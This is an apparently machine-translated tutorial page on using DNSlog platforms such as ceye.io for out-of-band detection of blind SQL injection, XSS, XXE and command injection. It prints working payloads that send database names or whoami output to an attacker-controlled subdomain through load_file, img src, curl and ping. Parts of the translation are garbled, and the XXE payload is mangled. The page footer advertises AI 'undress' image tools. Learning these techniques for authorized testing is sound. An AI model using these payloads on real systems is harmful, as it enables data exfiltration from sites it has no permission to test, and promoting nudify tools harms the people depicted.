search
HomeOperation and MaintenanceSafetyHow to reasonably use DNSLOG to conduct echo-free security testing

When actually testing the security issues of some websites, some test commands have no response after execution. We can write scripts for blind injection, but some websites will block our IP address, so we can pass Setting up an IP proxy pool solves the problem, but blind injection is often inefficient, so DNSlog injection occurs.

Before using dnslog, we need to understand the backtick symbol:
Symbol: `
Name: backtick, upper delimiter
Position: backtick, this character is usually on the keyboard The upper left corner, to the left of the number 1, do not confuse it with single quotes
Function: The string enclosed in backticks is interpreted by the shell as a command line. When executed, the shell first executes the command line and uses its standard The output replaces the entire backticks (including two backticks).
How to reasonably use DNSLOG to conduct echo-free security testing
The DNSlog echo test is as follows:
First, you need to have a configurable domain name, such as: ceye.io, and then set the nameserver of the domain name ceye.io as your own server A through an agent. Then configure the DNS Server on server A, so that all queries for ceye.io and its subdomain names will go to server A. At this time, domain name query requests can be monitored in real time, as shown in the figure below.
How to reasonably use DNSLOG to conduct echo-free security testing
DNS will leave logs when parsing. Our purpose is to read the parsing logs of multi-level domain names to obtain information.
Simply put, the information is placed in high-level domain names and passed Go to yourself, and then read the log to get the information.
The principle is very abstract, let’s take a look at it through practical examples.
http://ceye.io This is a free platform for recording dnslog. After registration, we will give you a second-level domain name in the control panel: xxx.ceye.io. When we put the injection information into the third-level domain name There, the background log will be recorded.
How to reasonably use DNSLOG to conduct echo-free security testing

0x01SQL blind injection
Take sql blind injection as an example. In-depth understanding of the DNSlog injection process:
The load_file() function required for blind injection through DNSlog, so it generally requires root permissions. show variables like '%secure%'; Check the disks that load_file() can read.
1. When secure_file_priv is empty, the directory on the disk can be read.
2. When secure_file_priv is G:\, you can read files on the G drive.
3. When secure_file_priv is null, load_file cannot load the file.
How to reasonably use DNSLOG to conduct echo-free security testing
Configure by setting my.ini. secure_file_priv="" can load_flie files on any disk.
How to reasonably use DNSLOG to conduct echo-free security testing
Execute on the mysql command line: select load_file('\\afanti.xxxx.ceye.io\aaa'); where afanti is the query statement to be injected
View the platform, dnsLog is recorded Come down.
How to reasonably use DNSLOG to conduct echo-free security testing
The load_file() function can resolve requests through dns.
Take the fifth level of sql-labs:
payload: ' and if((select load_file(concat('\\',(select database()),'.xxxxx.ceye.io\abc')) ),1,0)-- -
Executed sql statement: SELECT * FROM users WHERE id='1' and if((select load_file(concat('\\',(select database()),'. xxxxx.ceye.io\abc'))),1,0)
Check the dnslog log and find that the security database was queried:
How to reasonably use DNSLOG to conduct echo-free security testing

0x02 XSS (no response Display)
Through touch typing, let the triggerer's browser access the preset link address. If the touch typing is successful, the following link access record will be received on the platform:
payload:>< ;img src=http://xss.xxxx.ceye.io/aaa>Let src request our dnslog platform
How to reasonably use DNSLOG to conduct echo-free security testing

##0x03 ×××F (no echo) payload:



%remote;]>

0x04 command execution (no echo)
When pinging a domain name, a recursive DNS query process will be performed on it. At this time, the DNS query request can be obtained on the backend. When the command is actually executed and the platform receives the echo, it will prove that the vulnerability does exist.
Linux
curl http://haha.xxx.ceye.io/`whoami

pingwhoami`.xxxx.ceye.io

Windows
ping %USERNAME%.xxx.ceye.io

How to reasonably use DNSLOG to conduct echo-free security testing

How to reasonably use DNSLOG to conduct echo-free security testing

The above is the detailed content of How to reasonably use DNSLOG to conduct echo-free security testing. For more information, please follow other related articles on the PHP Chinese website!

Statement
This article is reproduced at:亿速云. If there is any infringement, please contact admin@php.cn delete
What category does the operation and maintenance security audit system belong to?What category does the operation and maintenance security audit system belong to?Mar 05, 2025 pm 03:59 PM

This article examines operational security audit system procurement. It details typical categories (hardware, software, services), budget allocation (CAPEX, OPEX, project, training, contingency), and suitable government contracting vehicles (GSA Sch

What are the job safety responsibilities of operation and maintenance personnelWhat are the job safety responsibilities of operation and maintenance personnelMar 05, 2025 pm 03:51 PM

This article details crucial security responsibilities for DevOps engineers, system administrators, IT operations staff, and maintenance personnel. It emphasizes integrating security into all stages of the SDLC (DevOps), implementing robust access c

What does the operation and maintenance safety engineer do?What does the operation and maintenance safety engineer do?Mar 05, 2025 pm 04:00 PM

This article explores the roles and required skills of DevOps, security, and IT operations engineers. It details the daily tasks, career paths, and necessary technical and soft skills for each, highlighting the increasing importance of automation, c

The difference between operation and maintenance security audit system and network security audit systemThe difference between operation and maintenance security audit system and network security audit systemMar 05, 2025 pm 04:02 PM

This article contrasts Operations Security (OpSec) and Network Security (NetSec) audit systems. OpSec focuses on internal processes, data access, and employee behavior, while NetSec centers on network infrastructure and communication security. Key

What is operation and maintenance security?What is operation and maintenance security?Mar 05, 2025 pm 03:54 PM

This article examines DevSecOps, integrating security into the software development lifecycle. It details a DevOps security engineer's multifaceted role, encompassing security architecture, automation, vulnerability management, and incident response

What is the prospect of safety operation and maintenance personnel?What is the prospect of safety operation and maintenance personnel?Mar 05, 2025 pm 03:52 PM

This article examines essential skills for a successful security operations career. It highlights the need for technical expertise (network security, SIEM, cloud platforms), analytical skills (data analysis, threat intelligence), and soft skills (co

What is operation and maintenance security?What is operation and maintenance security?Mar 05, 2025 pm 03:58 PM

DevOps enhances operational security by automating security checks within CI/CD pipelines, utilizing Infrastructure as Code for improved control, and fostering collaboration between development and security teams. This approach accelerates vulnerabi

Main work of operation and maintenance securityMain work of operation and maintenance securityMar 05, 2025 pm 03:53 PM

This article details operational and maintenance (O&M) security, emphasizing vulnerability management, access control, security monitoring, data protection, and physical security. Key responsibilities and mitigation strategies, including proacti

See all articles

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

AI Hentai Generator

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

Repo: How To Revive Teammates
1 months agoBy尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)
2 weeks agoBy尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island Adventure: How To Get Giant Seeds
1 months agoBy尊渡假赌尊渡假赌尊渡假赌

Hot Tools

Dreamweaver Mac version

Dreamweaver Mac version

Visual web development tools

VSCode Windows 64-bit Download

VSCode Windows 64-bit Download

A free and powerful IDE editor launched by Microsoft

MinGW - Minimalist GNU for Windows

MinGW - Minimalist GNU for Windows

This project is in the process of being migrated to osdn.net/projects/mingw, you can continue to follow us there. MinGW: A native Windows port of the GNU Compiler Collection (GCC), freely distributable import libraries and header files for building native Windows applications; includes extensions to the MSVC runtime to support C99 functionality. All MinGW software can run on 64-bit Windows platforms.

PhpStorm Mac version

PhpStorm Mac version

The latest (2018.2.1) professional PHP integrated development tool

SAP NetWeaver Server Adapter for Eclipse

SAP NetWeaver Server Adapter for Eclipse

Integrate Eclipse with SAP NetWeaver application server.